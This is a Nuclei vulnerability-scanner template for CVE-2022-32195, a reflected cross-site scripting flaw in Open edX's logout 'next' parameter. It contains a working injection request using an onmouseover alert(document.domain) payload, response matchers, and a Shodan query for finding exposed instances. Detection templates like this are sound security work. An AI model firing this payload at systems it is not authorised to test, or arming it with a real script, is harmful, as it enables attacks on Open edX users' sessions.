nuclei-templates/cves/2022/CVE-2022-32195.yaml

46 lines
1.2 KiB
YAML

id: CVE-2022-32195
info:
name: Open edX <2022-06-06 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
reference:
- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
- https://github.com/edx
- https://nvd.nist.gov/vuln/detail/CVE-2022-32195
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32195
cwe-id: CWE-79
metadata:
comment: Hover the cursor on the redirect link
shodan-query: http.html:"Open edX"
verified: "true"
tags: cve,cve2022,openedx,xss
requests:
- method: GET
path:
- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14